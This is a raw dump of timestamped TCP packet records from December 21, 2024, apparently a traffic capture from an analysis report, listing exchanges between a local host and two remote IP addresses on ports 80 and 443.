                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.426743984 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.426795006 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.427475929 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.427630901 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.428045988 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.428133965 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.428286076 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.428365946 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.429282904 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.429361105 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.429562092 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.429622889 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.430502892 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.430552959 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.431042910 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.431221008 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.431607962 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.431618929 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.431668043 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.432825089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.432837009 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.432879925 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.433923960 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.433933973 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.433974981 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.434835911 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.434890985 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.434901953 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.434962034 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.435270071 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.435318947 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.435722113 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.435770035 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.436652899 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.436664104 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.436705112 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440624952 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440634012 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440644026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440674067 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440709114 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440794945 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440875053 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440886974 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.440907001 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.441423893 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.441468954 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.442161083 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.442214012 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.442898035 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.442955971 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.443474054 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.443485022 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.443519115 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.444562912 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.444608927 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.444734097 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.444780111 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.445628881 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.445686102 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.445807934 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.445868969 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.446135044 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.446190119 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.576143026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.576195002 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.576431990 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.576476097 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.576731920 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.576778889 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.576793909 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.576939106 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.577641010 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.577686071 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.577800989 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.577853918 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.578794956 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.578859091 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.579699039 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.579749107 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.579988956 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.579998970 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.580038071 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.581154108 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.581195116 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.581337929 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.581509113 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.582370043 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.582381010 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.582415104 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.582446098 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.583484888 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.583532095 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.583714008 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.583760023 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.584909916 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.584973097 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.585663080 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.585882902 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.585895061 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.585928917 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.585947037 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.587064028 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.587116957 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.588255882 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.588268995 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.588387012 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.588411093 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.588426113 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.589386940 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.589725018 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.589931965 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.590481043 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.590562105 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.590615034 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.590895891 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.590961933 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.591717005 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.591773033 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.592365026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.592928886 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.592989922 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.593043089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.593168020 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.594070911 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.594311953 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.595288038 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.595298052 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.595344067 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.595365047 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.595403910 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.596434116 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.597006083 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.597595930 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.597645044 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.597652912 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.597664118 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.597714901 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.598783016 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.598845959 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.599121094 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.599170923 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.599960089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.600150108 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.600200891 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.601144075 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.601419926 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.601505995 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.601686001 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.602308989 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.602360010 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.603329897 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.603399992 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.603514910 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.603526115 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.603568077 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.604655027 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.604712963 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.605427980 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.605763912 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.605873108 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.605885029 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.605932951 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.607072115 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.607273102 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.607839108 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.607889891 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.608275890 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.608318090 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.608448029 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.608493090 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.609366894 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.609416008 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.609503984 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.609570980 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.610560894 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.610621929 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.610656023 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.610708952 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.611751080 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.611891031 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.611898899 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.611958981 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.612914085 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.612971067 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.613692999 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.613751888 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.614078045 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.614134073 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.615266085 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.615278959 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.615320921 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.615341902 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.615365982 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.616435051 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.616503954 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.617604971 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.617646933 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.617660999 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.617671967 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.617714882 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.618771076 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.618829012 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.619273901 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.619321108 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.620012045 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.620060921 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.620198965 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.620256901 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.621150970 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.621192932 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.621876001 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.622327089 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.622371912 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.622967005 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.623488903 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.623539925 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.624245882 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.624511003 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.624675035 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.624830961 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.624875069 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.625844002 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.626102924 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.627043009 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.627054930 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.627069950 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.627089024 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.627114058 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.628201962 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.628258944 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.629338026 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.629395008 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.629396915 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.629409075 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.629492044 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.629492044 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.630527973 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.630603075 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.630625963 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.630649090 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.631732941 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.631778002 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.632163048 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.632208109 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.632903099 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.632956982 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.634072065 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.634083033 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.634123087 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.634155035 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.634691000 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.635281086 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.635337114 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.635618925 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.635667086 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.636475086 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.637116909 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.637586117 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.637640953 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.637788057 CET804991031.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.637825966 CET4991080192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777126074 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777178049 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777230024 CET49917443192.168.2.5104.21.23.76
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777252913 CET44349917104.21.23.76192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:48.777348995 CET44349917104.21.23.76192.168.2.5
